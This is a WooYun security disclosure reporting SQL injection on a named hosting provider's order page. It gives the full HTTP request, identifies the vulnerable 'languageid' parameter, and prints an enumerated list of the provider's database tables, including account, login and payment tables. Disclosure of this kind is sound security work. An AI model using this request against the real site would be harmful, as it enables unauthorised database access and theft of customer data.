当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132827

漏洞标题:E动网某站存在SQL注入

相关厂商:中国E动网

漏洞作者: 路人甲

提交时间:2015-08-10 11:08

修复时间:2015-08-15 11:10

公开时间:2015-08-15 11:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /host/host_order.aspx HTTP/1.1
Content-Length: 165
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://new.edong.com:80/
Cookie: ASP.NET_SessionId=hsaufovysnfdmxkur4gu1amy; temp_user=sessionkey=temp_4U6WSLuFcqL0wOXK
Host: new.edong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=ProductSpec&dbspace=80&hosttype=1,2,3,4,5,6,9,11,12,26,27,24,23&languageid=3&lineid=5&productid=22029&quota=100&traffic=80

languageid参数

漏洞证明:

31.png

Database: biz
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.Biz_ShoppingCart_Para                  | 32163   |
| dbo.biz_Task_Host_UpZip_Log                | 8767    |
| dbo.Task_Host_UpZip_Log_View               | 8767    |
| dbo.biz_order_para                         | 8495    |
| dbo.biz_shoppingcart                       | 5420    |
| dbo.biz_DNS_Sub                            | 5093    |
| dbo.log_operatiom                          | 3441    |
| dbo.sys_Area_1                             | 3144    |
| dbo.log_InOut                              | 2502    |
| dbo.log_sys                                | 2479    |
| dbo.biz_Task_Host_UpZip                    | 2402    |
| dbo.bizProduct_Spec                        | 1544    |
| dbo.biz_Vhost_Web_Para                     | 1242    |
| dbo.biz_order_operation                    | 1142    |
| dbo.OrderOperation_View                    | 1142    |
| dbo.biz_Account_MailInform                 | 931     |
| dbo.biz_ProductPrice                       | 920     |
| dbo.ProductPrice_Account_Level_View        | 920     |
| dbo.sys_Area                               | 918     |
| dbo.biz_Account_Email                      | 871     |
| dbo.biz_Order                              | 856     |
| dbo.biz_Account_supplement                 | 817     |
| dbo.financialControl                       | 807     |
| dbo.financialControl_ClassName             | 807     |
| dbo.sys_City                               | 775     |
| dbo.biz_DNS                                | 714     |
| dbo.OrderDetailInfo                        | 711     |
| dbo.OrderList                              | 711     |
| dbo.Print_Order                            | 711     |
| dbo.biz_VHostToService                     | 666     |
| dbo.help_ModuleAndInfo                     | 651     |
| dbo.help_View                              | 651     |
| dbo.HelpModuleAndInfo_View                 | 651     |
| dbo.sys_Privilege                          | 613     |
| dbo.help_Info                              | 557     |
| dbo.biz_Host_Open                          | 540     |
| dbo.biz_RelationVHostToIP                  | 478     |
| dbo.biz_DNS_Log                            | 471     |
| dbo.biz_Host_Open_Para                     | 443     |
| dbo.biz_AccountLevel_Relation              | 374     |
| dbo.Biz_Account_financial                  | 372     |
| dbo.biz_Account_Login                      | 372     |
| dbo.Account_Account_Level_View             | 369     |
| dbo.Account_info                           | 369     |
| dbo.Biz_Account                            | 369     |
| dbo.GetDomainsDNS                          | 295     |
| dbo.biz_Relation_HostToDomain              | 264     |
| dbo.Host_Ftp_Domains_View                  | 264     |
| dbo.s_Permission                           | 224     |
| dbo.VirtualHostList_View                   | 224     |
| dbo.biz_VHost_FTP                          | 222     |
| dbo.biz_Vhost_Web                          | 222     |
| dbo.biz_VirtualHost                        | 222     |
| dbo.HostList_View                          | 222     |
| dbo.VirtualHost_Product_Hsot_Relation_View | 222     |
| dbo.biz_domains_para                       | 219     |
| dbo.Industry_select_Control                | 216     |
| dbo.biz_domains                            | 205     |
| dbo.domain_para_sub                        | 205     |
| dbo.domain_register_info                   | 205     |
| dbo.GetDomains_productClass                | 205     |
| dbo.GetProductClassName                    | 205     |
| dbo.Domains_Para_View                      | 196     |
| dbo.sys_Button                             | 146     |
| dbo.Biz_Product                            | 118     |
| dbo.biz_transcation_para                   | 115     |
| dbo.Product_ProductClass_View              | 114     |
| dbo.biz_OnlinePayment                      | 103     |
| dbo.OnlinePaymentList_View                 | 103     |
| dbo.Host_Open_Account_Level_View           | 90      |
| dbo.bizProduct_SalesScope                  | 89      |
| dbo.job_select_Control                     | 89      |
| dbo.Product_SalesScope_Account_Level_View  | 89      |
| dbo.s_Buttons                              | 77      |
| dbo.help_ThreeMenu                         | 62      |
| dbo.biz_Account_SMS                        | 60      |
| dbo.s_Menus                                | 58      |
| dbo.biz_Domain_Out_Contacts                | 56      |
| dbo.biz_DomainsParas                       | 54      |
| dbo.biz_Answer                             | 53      |
| dbo.sys_Menus                              | 52      |
| dbo.rolefun                                | 51      |
| dbo.sys_Account_mantainance                | 49      |
| dbo.biz_domains_trans_in                   | 45      |
| dbo.biz_Vhost_DB                           | 45      |
| dbo.Domains_Trans_In_View                  | 45      |
| dbo.biz_transcation                        | 43      |
| dbo.sys_Country                            | 43      |
| dbo.biz_Product_Hsot_Relation              | 38      |
| dbo.bizProductClass                        | 37      |
| dbo.biz_domains_trans_out                  | 36      |
| dbo.Domains_Trans_Out_View                 | 36      |
| dbo.biz_Server_Para                        | 35      |
| dbo.ServerInfo_Server_Para_View            | 35      |
| dbo.sys_Province                           | 34      |
| dbo.biz_BackGround                         | 33      |
| dbo.biz_Question                           | 32      |
| dbo.Question_View                          | 32      |
| dbo.select_Control                         | 30      |
| dbo.biz_QuestionLog                        | 23      |
| dbo.Contact_Default                        | 23      |
| dbo.DomainTempleteList                     | 23      |
| dbo.questionLog_view                       | 23      |
| dbo.biz_Billing_Template                   | 20      |
| dbo.biz_RelationQuestionToDepart           | 20      |
| dbo.help_SecondaryMenu                     | 18      |
| dbo.biz_Host_Type                          | 17      |
| dbo.Answer_View                            | 16      |
| dbo.biz_DNS_Line                           | 16      |
| dbo.help_Module                            | 16      |
| dbo.Template                               | 16      |
| dbo.biz_domain_log                         | 14      |
| dbo.Biz_Server_Type_Para                   | 14      |
| dbo.biz_task                               | 14      |
| dbo.Sys_IpRange                            | 13      |
| dbo.biz_Account_level                      | 12      |
| dbo.biz_domains_change_account             | 12      |
| dbo.DomainsChangeAccount_View              | 12      |
| dbo.sys_Account                            | 12      |
| dbo.sys_user                               | 12      |
| dbo.s_Account                              | 10      |
| dbo.sys_para                               | 10      |
| dbo.Biz_Mail_Type                          | 9       |
| dbo.biz_Server_Connection                  | 9       |
| dbo.biz_Server_Info                        | 9       |
| dbo.biz_Server_IP                          | 9       |
| dbo.help_MainMenu                          | 9       |
| dbo.InvoiceAccountList_View2               | 9       |
| dbo.relation_ordertoInvoice                | 9       |
| dbo.s_AccountToRole                        | 9       |
| dbo.sys_userrole                           | 9       |
| dbo.biz_productpackages_detail             | 7       |
| dbo.v_user                                 | 7       |
| dbo.biz_DepartMent                         | 5       |
| dbo.biz_Host_LineType                      | 5       |
| dbo.biz_productpackages                    | 5       |
| dbo.biz_productPrice_change                | 5       |
| dbo.s_Role                                 | 5       |
| dbo.biz_domains_change_register            | 4       |
| dbo.biz_QuestionForBusiness                | 4       |
| dbo.QuestionForBusiness_View               | 4       |
| dbo.biz_domains_register                   | 3       |
| dbo.biz_Host_Language                      | 3       |
| dbo.biz_Host_Open_Maintain                 | 3       |
| dbo.biz_job_description                    | 3       |
| dbo.Biz_Vhost_Web_Mime                     | 3       |
| dbo.Domains_Register_View                  | 3       |
| dbo.sys_dept                               | 3       |
| dbo.Biz_InvoiceTemplate                    | 2       |
| dbo.biz_Mail_Product                       | 2       |
| dbo.biz_Product_Host_Type                  | 2       |
| dbo.biz_QuestionForProduct                 | 2       |
| dbo.MailProduct_View                       | 2       |
| dbo.biz_domains_change_param               | 1       |
| dbo.roles                                  | 1       |
| dbo.sys_Favorite                           | 1       |
| dbo.sys_info_from                          | 1       |
| dbo.sys_role                               | 1       |
+--------------------------------------------+---------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-15 11:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无